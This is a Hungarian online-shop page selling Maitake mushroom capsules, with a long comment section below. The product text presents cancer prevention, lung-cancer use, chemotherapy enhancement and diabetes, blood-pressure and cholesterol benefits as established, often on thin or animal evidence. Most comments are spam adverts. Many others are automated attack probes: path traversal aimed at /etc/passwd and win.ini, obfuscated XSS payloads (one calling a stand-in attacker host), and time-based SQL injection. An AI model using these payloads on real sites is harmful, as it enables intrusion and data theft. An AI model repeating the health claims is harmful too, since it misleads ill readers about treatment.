kép

Maitake - Grifola frondosa


Ár: 6 990 Ft

Share

A Maitake japán szó, ami “táncoló gombát” jelent. Ez arra mutat, hogy aki ilyen gombát talál, az örömében táncra perdül. A Maitake Grifola frondosa hatóanyaga jótékony hatással van a szervezet vércukorszintjére. Vizsgálatok bizonyítják a Maitake rákmegelőző (gátolja a rákos sejtek növekedését), valamint immunerősítő szerepét, és azt is érdemes tudni, hogy a maitake részt vesz az oszteoporózis-betegség kialakulásának csökkentésében. Kutatások irányulnak továbbá arra, hogy milyen mértékben befolyásolja a gyógygomba hatóanyaga a magas vérnyomást és a szervezet koleszterinszintjét.

A szervezet ellenálló képességének (immunrendszer) megtartására alkalmazzák általában. A hosszantartó kutatások igazolták, hogy a maitake olyan egyedi és különleges molekuláris összetétellel rendelkezik, ami csak erre a gombatípusra jellemző. Összetételének köszönhetően igen hatásos tumor-ellenes hatású, mivel jelentős mértékben serkentik az immunsejteket. Hatóanyaga révén jelentősen csökkenthető a kemo- és sugárterápia szervezetre gyakorolt mellékhatása. A maitake béta-glükán tartalma nagy mértékben támogatja a szervezet immunrendszerét.

Igen gazdag ásványi anyagokban (kalcium, kálium, magnézium), valamint B2-vitaminban, D-vitaminban. A gomba aminosavakat és rostokat is tartalmaz. 
A maitake hatóanyagai egyes kutatások szerint hozzájárulhatnak különféle ráktípusok - emlőrák, prosztatarák – sikeres kezelésében. Hatóanyagai jótékony hatásúak a cukorbetegek számára.

Összetevők: Maitake /Grifola frondosa /Óriás bokrostapló gombapor, Grifola frondosa kivonatot, Maiitake MD-frakció, hidroxi-proril-metil-cellulóz
Hatóanyagok: 6 kapszulára vonatkoztatva:
2400 mg Maitake /Grifola frondosa /Óriás bokrostapló gombapor
600 mg Grifola frondosa kivonatot
120 mg Maiitake MD-frakció 
Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Alkalmazási területek:

immunrendszer erősítő
rákmegelőző
tüdőrák esetén
koleszterinszint csökkentő
magasvérnyomás csökkentő
cukorbetegség ellen


Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!

Grifola frondosa Óriás bokrostapló/ Bokrosgomba (klinikai útmutató: Martin Powell)

japán neve – Maitake/ „táncoló gomba”
kínai neve - Hui Shu Hua
angol neve - Hen of the Woods (az erdők tyúkja)

A népszerű ínyenc bokrosgomba nagy tekintélynek örvend a gyógyászatban, különösen a rák elleni küzdelemben. Mint a legtöbb tumorellenes gombánál (pl. Lentinus edodes, Trametes versicolor), a bokrosgomba fő hatóanyagai között is megtalálható azok a poliszacharid és proteoglikán frakciók (D- és MD-4-frakció), melyek aktiválva az immunrendszer rákellenes immunsejtjeit (NK sejtek) megakadályozták a rákos sejtek gyors szaporodását. 
A bokrosgomba ritka, de hazákban is fellelhető, ehető gomba júniustól októberig a tölgy és gesztenyefák tövében telepszenek meg. 

A legtöbb klinikai kutatást Japánban végezték el vele, ahol az egyik kutatócsoport kezdetben a D-frakciót együtt használta a spóratermelő gombatest őrleményével, majd áttértek a bioaktívabb MD-frakcióra, majd ismét kiegészítették azt a gombatest porával.  

Rákos megbetegedések
Nanba H 1997-es beszámolójában közzétette, hogy kemoterápiás szerek mellett adagolt a G. frondosa termőtest őrleménye számos előrehaladott állapotban (III-IV. stádiumban) lévő rákbetegnél 12-28% -kal megnövelte a kemoterápia hatásfokát. A dolgozat további pozitív eredményről is beszámolt a G. frondosa kivonatának (D-frakció) és a Mitomycin C kemoterápiás szer kombinált adagolása mellett, amelyet állati tumoroknál figyeltek meg. A japán vizsgálat ez által igazolta a bokrosgomba tumorgátló hatását.  

További vizsgálatok megerősítették, hogy az alkalmazott kombinációs terápia enyhítette a kemoterápia mellékhatásait, beleértve az étvágytalanságot, a hányást, hányingert, a hajhullást és a leukopeniát. Hasonlóan, mint amikor a G. frondosa  D-frakcióját a C-vitaminnal együtt adagolták.

Egy későbbi írásában Nanba H és munkatársai lenyűgöző eredményeket észleltek az MD-frakció és a G. frondosa termőtest porának alkalmazása során, miszerint az emlődaganatban szenvedők 68%-ánál, a tüdőrákosok 63 %-ánál és a májdaganatosok 58%-ánál következett be lényeges állapotjavulás: csökkentek a kemoterápia mellékhatásai és javultak a laboreredményeik (IL-2 és a CD4+ növekedett).

Cukorbetegség 
Különböző cukorbetegséget modellező állatkísérleteknél kimutatták a G. frondosa előnyeit, azonban csak igen nagy dózisban (1g/nap) alkalmazva volt hatásos az egerek genetikus cukorbetegségénél alfa-glükán (150-450mg / kg) együttadás esetében.
Klinikai vizsgálatok során megfigyelték a G. frondosa poliszacharid kivonatának (a dózis nem egyértelmű) vércukorszintre gyakorolt hatását, majd megállapították, hogy 4 páciens esetében 30% -al csökkentette a vércukorszintet. Ezek után a kivonatot kiegészítették a G. frondosa béta-glükánjával (150mg/nap), itt már 20 fő II-es típusú cukorbeteg vércukorszintjénél tapasztaltak látványos javulást.

Az utóbbi években egyre világosabbá vált, hogy az egyes gyógyhatású gombák rákellenes hatásuk nem csak az immunrendszer modulálásával érik el, hanem az inzulin érzékenység növelésével is hozzájárulnak a kedvező eredményekhez. Természetesen azoknál is, akik nem cukorbetegek. Ugyanis az inzulin érzékenység csökkenése elősegíti számos ráktípus kialakulását és a már megbetegedetteknél csökkentheti a túlélési esélyeket (pl. emlő, máj, prosztata, hasnyálmirigy, vastagbélrák).

Koleszterin szint
A G. frondosa-val kiegészített állattakarmány 5-20%-al csökkentette az állatok koleszterin szintjét, míg ezt az eredményt más gombafélék hozzáadása esetén nem tapasztalták.

Magas vérnyomás
Számos állatkísérlet igazolja, hogy a G. frondosa tartalmú takarmány (ált. 5% tartalom) gyors, de nem tartós vérnyomáscsökkenéshez vezet.
Kiegészítési javaslat:

Csontritkulás
A Grifola frondosa, valószínűleg az ergosterin és a proteoglikán tartalmának köszönhetően hozzájárul a csontritkulás (osteoporosis) megelőzéséhez.

KLINIKAI ÖSSZESÍTŐ

Terápiás jelentősége:
Tumor gátlás, (immunrendszer erősítése, vércukorszint, vérnyomás és koleszterinszint csökkentés, osteoporosis megelőzés.

Fő hatóanyagai:
-    poliszacharidok
-    proteoglikán frakciók (D- és MD-4-frakció)

A Grifola frondosa (bokrosgomba) támogatja az immunrendszer működését.

Összetevők: Maitake /Grifola frondosa /Óriás bokrostapló gombapor, Grifola frondosa kivonatot, Maiitake MD-frakció, hidroxi-proril-metil-cellulóz

OÉTI:9810/2011

Kiszerelés: 60db kapszula/doboz

Összetevők:

Maitake /Grifola frondosa /Óriás bokrostapló gombapor, Grifola frondosa kivonatot, Maiitake MD-frakció, hidroxi-proril-metil-cellulóz

Hatóanyagok: 6 kapszulára vonatkoztatva:

2400 mg Maitake /Grifola frondosa /Óriás bokrostapló gombapor
600 mg Grifola frondosa kivonatot
120 mg Maiitake MD-frakció 

Adagolás:2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!

Származási hely: Anglia

Greta Mcgibboney 2022-01-13 22:43:01
Értékelés:
Sol Chamlee 2021-11-23 01:56:42
Értékelés:
Migdalia Gitter 2021-10-17 09:37:37
Értékelés:
Gordon Caricofe 2021-08-24 22:48:50
Értékelés:
Robbin Branch 2021-08-22 02:56:34
Értékelés:
With over 3.5 billion searches per day, Google is a hotspot for consumers. And with its location-specific and rich results, it is ingrained in our daily lives as the go-to tool for, well, anything — getting the weather, buying tickets, finding products, vetting services, answering quick questions, seeing if a local store is open, and the list goes on. Here are some strategies your local business can implement to get on this highly trafficked search engine for free. https://1mdr.short.gy/l4bIIa
Hildegarde Knouse 2021-08-15 19:15:28
Értékelés:
You won't believe how easy it is to get free advertising on Google. Here's 20 Clever Ways to Get Free Advertising on Google & Beyond: https://bit.ly/how-to-get-free-advertising-on-google
Darrell Cuthbertson 2021-08-13 15:16:12
Értékelés:
Arden Haggan 2021-08-08 16:51:22
Értékelés:
Tasia Vinck 2021-07-15 01:19:12
Értékelés:
Hosea Eagy 2021-06-25 15:33:07
Értékelés:
Annalisa 2021-06-05 03:06:25
Értékelés:
Ai 2021-04-12 13:46:48
Értékelés:
Glennis Chisnall 2021-02-02 03:38:35
Értékelés:
Ermelinda Maclurcan 2021-01-27 05:31:21
Értékelés:
Get visitors to your online biz or "brick and mortar" shop at zero cost. This post shows 5 different methods to get tons of free ads for your business: https://bit.ly/5waystoadvertisefree
Klara Guercio 2021-01-20 02:02:28
Értékelés:
Have you heard that contact form messages like these can actually be a great way to get more visitors and sales for your business? How can we do it? Easy peasy, we put together an ad for your business and we submit it to hundreds of thousands contact forms on any kind of website you want. Does this work? You're living proof that they do since you're reading this message right now The awesome thing is, this won't cost you much more than $25 a week! Want to find out more? shoot us a quick email to: HansenAndyc65833@gmail.com
Adolph Redfern 2021-01-15 18:22:17
Értékelés:
Would you like to promote your website for absolutely no cost at all? Check this out: https://bit.ly/totally-free-ads
Ashley Imai 2021-01-15 00:38:41
Értékelés:
mhckwcpg 2020-08-15 19:38:02
Értékelés:
WEB-INF\web.xml
mhckwcpg 2020-08-15 19:37:59
Értékelés:
WEB-INF/web.xml
mhckwcpg 2020-08-15 19:37:57
Értékelés:
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
mhckwcpg 2020-08-15 19:37:54
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
mhckwcpg 2020-08-15 19:37:49
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
mhckwcpg 2020-08-15 19:37:47
Értékelés:
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
mhckwcpg 2020-08-15 19:37:44
Értékelés:
..\..\..\..\..\..\..\..\windows\win.ini
mhckwcpg 2020-08-15 19:37:42
Értékelés:
................windowswin.ini
mhckwcpg 2020-08-15 19:37:36
Értékelés:
mhckwcpg 2020-08-15 19:37:32
Értékelés:
../../../../../../../../../../windows/win.ini.jpg
mhckwcpg 2020-08-15 19:37:29
Értékelés:
C:\WINDOWS\system32\drivers\etc\hosts
mhckwcpg 2020-08-15 19:37:28
Értékelés:
../../../../../../../../../../windows/win.ini
mhckwcpg 2020-08-15 19:37:26
Értékelés:
WEB-INF\web.xml
mhckwcpg 2020-08-15 19:37:22
Értékelés:
/WEB-INF/web.xml
mhckwcpg 2020-08-15 19:37:15
Értékelés:
WEB-INF/web.xml
mhckwcpg 2020-08-15 19:37:13
Értékelés:
/\../\../\../\../\../\../\../etc/passwd
ffrnnktk 2020-08-15 19:37:10
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img sRc='http://attacker-9977/log.php?
mhckwcpg 2020-08-15 19:37:09
Értékelés:
file:///etc/passwd
ffrnnktk 2020-08-15 19:37:02
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<48qLv5 x=9248>
mhckwcpg 2020-08-15 19:36:57
Értékelés:
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
mhckwcpg 2020-08-15 19:36:49
Értékelés:
..
ffrnnktk 2020-08-15 19:36:48
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ifRAme sRc=9055.com></IfRamE>
mhckwcpg 2020-08-15 19:36:45
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
ffrnnktk 2020-08-15 19:36:37
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WNZE5R>1FSWJ[!+!]</WNZE5R>
mhckwcpg 2020-08-15 19:36:35
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
mhckwcpg 2020-08-15 19:36:30
Értékelés:
/.././.././.././.././.././.././.././../etc/./passwd%00
mhckwcpg 2020-08-15 19:36:27
Értékelés:
%2fetc%2fpasswd
ffrnnktk 2020-08-15 19:36:27
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!X2i2n <ScRiPt >Ljdv(9578)</ScRiPt>
mhckwcpg 2020-08-15 19:36:25
Értékelés:
/etc/passwd
mhckwcpg 2020-08-15 19:36:22
Értékelés:
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
mhckwcpg 2020-08-15 19:36:18
Értékelés:
/../..//../..//../..//../..//../..//etc/passwd.jpg
ffrnnktk 2020-08-15 19:36:17
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<% contenteditable onresize=Ljdv(9963)>
mhckwcpg 2020-08-15 19:36:16
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
ffrnnktk 2020-08-15 19:36:11
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!}body{acu:Expre/**/SSion(Ljdv(9391))}
mhckwcpg 2020-08-15 19:36:10
Értékelés:
../../../../../../../../../../etc/passwd.jpg
mhckwcpg 2020-08-15 19:36:07
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
mhckwcpg 2020-08-15 19:36:00
Értékelés:
../../../../../../../../../../../../../../../proc/version
ffrnnktk 2020-08-15 19:36:00
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img<!-- --> src=x onerror=alert(9554);//><!-- -->
mhckwcpg 2020-08-15 19:35:54
Értékelés:
../../../../../../../../../../etc/passwd
ffrnnktk 2020-08-15 19:35:50
Értékelés:
[url=http://www.vulnweb.com][/url]
ffrnnktk 2020-08-15 19:35:43
Értékelés:
<a HrEF=jaVaScRiPT:>
ffrnnktk 2020-08-15 19:35:34
Értékelés:
<a HrEF=http://www.vulnweb.com></a>
ffrnnktk 2020-08-15 19:35:29
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=Ljdv(9958)>
ffrnnktk 2020-08-15 19:35:17
Értékelés:
ffrnnktk 2020-08-15 19:35:04
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!&lt;ScRiPt&gt;Ljdv(9144)&lt;/sCripT&gt;
ffrnnktk 2020-08-15 19:34:57
Értékelés:
Írj véleményt a termékről!\u003CScRiPt\Ljdv(9146)\u003C/sCripT\u003E
ffrnnktk 2020-08-15 19:34:48
Értékelés:
%25%63%33%25%38%64%72%6A%25%32%30%76%25%63%33%25%61%39%6C%65%6D%25%63%33%25%61%39%6E%79%74%25%32%30%61%25%32%30%74%65%72%6D%25%63%33%25%61%39%6B%72%25%63%35%25%39%31%6C%21%3C%53%63%52%69%50%74%20%3E%4C%6A%64%76%289376%29%3C%2F%73%43%72%69%70%54%3E
ffrnnktk 2020-08-15 19:34:42
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img/src=">" onerror=alert(9139)>
ffrnnktk 2020-08-15 19:34:25
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=xyz OnErRor=Ljdv(9809)>
ffrnnktk 2020-08-15 19:34:11
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=//testasp.vulnweb.com/t/dot.gif onload=Ljdv(9349)>
ffrnnktk 2020-08-15 19:34:00
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<body onload=Ljdv(9426)>
ffrnnktk 2020-08-15 19:33:53
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9558'>
ffrnnktk 2020-08-15 19:33:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<isindex type=image src=1 onerror=Ljdv(9275)>
ffrnnktk 2020-08-15 19:33:38
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<svg
ffrnnktk 2020-08-15 19:33:27
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<video><source onerror="javascript:Ljdv(9140)">
ffrnnktk 2020-08-15 19:33:19
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >Ljdv(9008)</ScRiPt>
ffrnnktk 2020-08-15 19:33:12
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9660></ScRiPt>
ffrnnktk 2020-08-15 19:33:06
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >Ljdv(9885)</ScRiPt>
ovwjfbtu 2020-08-15 19:33:04
Értékelés:
415'
ffrnnktk 2020-08-15 19:32:58
Értékelés:
Írj véleményt a termékről!<ScR<ScRiPt>IpT>Ljdv(9890)</sCr<ScRiPt>IpT>
ovwjfbtu 2020-08-15 19:32:55
Értékelés:
fcmABOsE'));select pg_sleep(76.572); --
ovwjfbtu 2020-08-15 19:32:48
Értékelés:
53ZKhwJd');select pg_sleep(76.572); --
ffrnnktk 2020-08-15 19:32:47
Értékelés:
Írj véleményt a termékről!<script>Ljdv(9291)</script>
ovwjfbtu 2020-08-15 19:32:46
Értékelés:
HMyiXNaf';select pg_sleep(76.572); --
ovwjfbtu 2020-08-15 19:32:44
Értékelés:
vo5oxivs'; waitfor delay '0:0:76.572' --
ovwjfbtu 2020-08-15 19:32:42
Értékelés:
1 waitfor delay '0:0:51.048' --
ffrnnktk 2020-08-15 19:32:39
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WTMJQF>OTAYY[!+!]</WTMJQF>
ovwjfbtu 2020-08-15 19:32:39
Értékelés:
(select(0)from(select(sleep(51.048)))v)/*'+(select(0)from(select(sleep(51.048)))v)+'"+(select(0)from(select(sleep(51.048)))v)+"*/
ovwjfbtu 2020-08-15 19:32:37
Értékelés:
if(now()=sysdate(),sleep(51.048),0)/*'XOR(if(now()=sysdate(),sleep(51.048),0))OR'"XOR(if(now()=sysdate(),sleep(51.048),0))OR"*/
ovwjfbtu 2020-08-15 19:32:32
Értékelés:
-1" OR 2+64-64-1=0+0+0+1 --
ffrnnktk 2020-08-15 19:32:27
Értékelés:
